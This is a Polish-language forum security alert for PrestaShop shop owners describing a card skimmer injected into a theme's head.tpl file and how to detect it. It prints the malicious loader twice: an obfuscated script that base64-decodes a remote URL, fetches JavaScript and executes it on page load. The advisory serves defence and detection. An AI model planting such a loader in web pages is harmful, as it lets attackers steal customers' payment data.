wdrożenia PrestaShop

Alert bezpieczeństwa dla PrestaShop

  • 0 Odpowiedzi
  • 55 Wyświetleń

0 użytkowników i 1 Gość przegląda ten wątek.

*

Offline west

  • Administrator
  • Mieszkaniec
  • *****
  • 5,303
  • 106
  • Płeć: Mężczyzna
  • Europasaz.pl
    • PrestaShop, Wordpress, SMF, Woocomerce
  • PrestaShop: 9.0
  • Status: Programista
Alert bezpieczeństwa dla PrestaShop
« dnia: Luty 12, 2026, 10:23:04 am »
Niedawno zidentyfikowaliśmy zagrożenie bezpieczeństwa wpływające na niektóre sklepy internetowe w ekosystemie PrestaShop. Wykryto złośliwy skrypt („cyfrowy skimmer”), który mógł spowodować kradzież niektórych informacji o płatnościach Twoich klientów.

Do czego robi ten cyfrowy skimmer?

To złośliwe oprogramowanie działa poprzez zastąpienie legalnych przycisków płatności na stronie kasy fałszywymi przyciskami. Gdy klient kliknie jeden z tych fałszywych przycisków, zostanie przekierowany do fałszywego formularza płatności zaprojektowanego w celu przechwycenia informacji o płatności.

Skimmer jest po prostu ładowany za pomocą tagu <script>, zapisanego bezpośrednio do pliku _partials/head.tpl aktywnego motywu sklepu. Oznacza to, że atakujący był w stanie zmodyfikować jeden z plików sklepu.

Jak mogę sprawdzić, czy mój sklep jest dotknięty?

W recepcji

Możesz sprawdzić swój kod front office, sprawdzając stronę swojej witryny (kliknij prawym przyciskiem myszy, a następnie "sprawdz").

Zajrzyj do wnętrza tagu <script>. Jeśli znajdziesz następujący kod, oznacza to, że Twój sklep jest dotknięty:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Uwaga: Część aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz zmienia się za każdym razem, ale struktura kodu pozostaje taka sama, a funkcja atob() jest zawsze używana. Kod może być obecny przed lub po (skimmer próbuje się ukryć, ponieważ jest nieco inny w każdym sklepie).

Na twoim serwerze

Jeśli wolisz sprawdzać swoje pliki, możesz znaleźć ten sam tag skryptu w pliku na swoim serwerze.

Połącz się z serwerem przez FTP, a następnie przejdź przez folder motywu, a następnie folder aktywnego motywu > folder szablonu > folder _partial > head.tpl. W tym pliku kliknij prawym przyciskiem myszy, a następnie "wyświetl/edytuj" i poszukaj tego samego tagu:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Co powinienem zrobić, jeśli mój sklep jest dotknięty?

Skontaktuj się ze swoją agencją lub wsparciem PrestaShop.

⚠️ Na tym etapie zdecydowanie zalecamy przeprowadzenie pełnej kontroli bezpieczeństwa sklepów PrestaShop i upewnienie się, że żaden z nich nie został naruszony.
MODUŁY | https://europasaz.pl |  SKLEPY INTERNETOWE | WSPARCIE TECHNICZNE | HOSTING | https://europasaz.pl